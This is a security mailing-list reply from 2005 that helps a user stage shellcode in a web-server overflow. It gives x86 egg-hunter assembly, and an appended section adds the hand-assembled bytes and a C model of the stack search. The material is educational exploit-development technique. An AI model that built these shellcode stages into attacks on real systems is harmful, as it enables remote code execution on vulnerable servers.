Vulnerability Development mailing list archives
Re: Exploitation Help
From: Felix Lindner <felix.lindner () nruns com>
Date: Wed, 18 May 2005 10:20:39 +0200
On 17 May 2005 09:20:51 -0000 <ramatkal () hotmail com> wrote:
> So, I am basically thinking, I overflow EIP with an address that JMP's -260 to the beginning of the Authorization header. The Authorization header then contains my Stage1 shellcode that starts searching down the stack for my Stage2 shellcode, which it will find about 2k down the stack in the GET request..... I hope somebody understands what the hell I am talking about....
You could easily implement a small piece of code in the 250 byte buffer doing the following:

        mov esi, esp                  ; start scanning at the current stack pointer
    Loop:
        inc esi                       ; step one byte at a time, no alignment assumed
        cmp dword [esi], 0x12345678   ; look for the 4-byte tag
        je found
        jmp short Loop
    found:
        add esi, 4                    ; skip the tag itself
        jmp esi                       ; run whatever follows it

and begin your "real" shellcode with 0x12345678 or any other pattern for that matter.

cheers
Felix

--
Felix Lindner, CISSP | Senior Security Consultant, n.runs GmbH
fx () nruns com | +49 (0)171 740 20 62
A hacker does for love what others would not do for money.
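As an added worked example, not part of Felix's post or the original thread: the stub above hand-assembled for 32-bit x86 (the byte encoding is my own assumption, not something the thread gives), and its search loop modelled in C over a constructed stack image. The layout (stub at esp, stage2 about 2 KiB higher, filler in between), the tag value and all function names are illustration-only assumptions. The model also shows the one caveat a practitioner would want: the tag appears inside the stub's own cmp immediate, so a scan that passes over the stub before reaching stage2 finds itself first. The usual fix is to look for the tag twice in a row, which the stub's immediate can never satisfy.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TAG 0x12345678u

/* The stub from the post, hand-assembled for 32-bit x86 (NASM syntax; the
   cmp needs an explicit dword size). The encoding is my own, not the thread's. */
static const unsigned char stage1[] = {
    0x89, 0xE6,                          /*        mov  esi, esp             */
    0x46,                                /* loop:  inc  esi                  */
    0x81, 0x3E, 0x78, 0x56, 0x34, 0x12,  /*        cmp  dword [esi], TAG     */
    0x74, 0x02,                          /*        je   found                */
    0xEB, 0xF5,                          /*        jmp  short loop           */
    0x83, 0xC6, 0x04,                    /* found: add  esi, 4               */
    0xFF, 0xE6                           /*        jmp  esi                  */
};

/* Read a little-endian dword at any alignment, as the cmp does. */
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Model of the loop: from 'start' step one byte at a time and return the
   offset just past the first dword equal to tag, or -1 if the region ends.
   The real stub has no bound; it keeps walking until it faults. */
long hunt_once(const unsigned char *mem, size_t len, size_t start, uint32_t tag)
{
    for (size_t i = start; i + 4 <= len; i++)
        if (rd32(mem + i) == tag)
            return (long)(i + 4);
    return -1;
}

/* Same search but for the tag twice in a row. The stub's own cmp immediate
   holds the tag only once, so this variant cannot match the stub itself. */
long hunt_twice(const unsigned char *mem, size_t len, size_t start, uint32_t tag)
{
    for (size_t i = start; i + 8 <= len; i++)
        if (rd32(mem + i) == tag && rd32(mem + i + 4) == tag)
            return (long)(i + 8);
    return -1;
}

enum { STACK_LEN = 4096, SP_OFF = 64, STAGE2_OFF = SP_OFF + 2048 };

/* Constructed stack image (assumed layout): filler, the stub sitting at esp,
   and 2 KiB higher a stage2 that begins with the tag twice, then an int3
   standing in for the real payload. Returns the offset of that payload. */
size_t build_stack(unsigned char *mem)
{
    static const unsigned char egg[8] = { 0x78, 0x56, 0x34, 0x12,
                                          0x78, 0x56, 0x34, 0x12 };
    memset(mem, 0x41, STACK_LEN);
    memcpy(mem + SP_OFF, stage1, sizeof stage1);
    memcpy(mem + STAGE2_OFF, egg, sizeof egg);
    mem[STAGE2_OFF + sizeof egg] = 0xCC;
    return STAGE2_OFF + sizeof egg;
}

/* Build the image and run one of the two searches starting at esp. */
long demo(int doubled)
{
    unsigned char stack[STACK_LEN];
    build_stack(stack);
    return doubled ? hunt_twice(stack, STACK_LEN, SP_OFF, TAG)
                   : hunt_once(stack, STACK_LEN, SP_OFF, TAG);
}

int main(void)
{
    long once = demo(0), twice = demo(1);
    printf("stage1 is %zu bytes\n", sizeof stage1);
    printf("single tag search lands at offset %ld (%s)\n", once,
           once == STAGE2_OFF + 8 ? "stage2" : "inside the stub itself");
    printf("double tag search lands at offset %ld (stage2 payload)\n", twice);
    return 0;
}
```

With the single tag the search jumps to offset 73, i.e. into the `je`/`jmp` bytes of the stub, because the scan crosses the stub's own immediate before it ever reaches the GET request; with the doubled tag it lands on the payload at offset 2120. The other thing the model makes explicit is that the stub has no bound: if the tag is never found it walks up past the end of the mapped stack and faults, so the tag must actually be present and above esp.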
Current thread:
- Exploitation Help ramatkal (May 17)
- Re: Exploitation Help James Longstreet (May 18)
- Re: Exploitation Help Felix Lindner (May 18)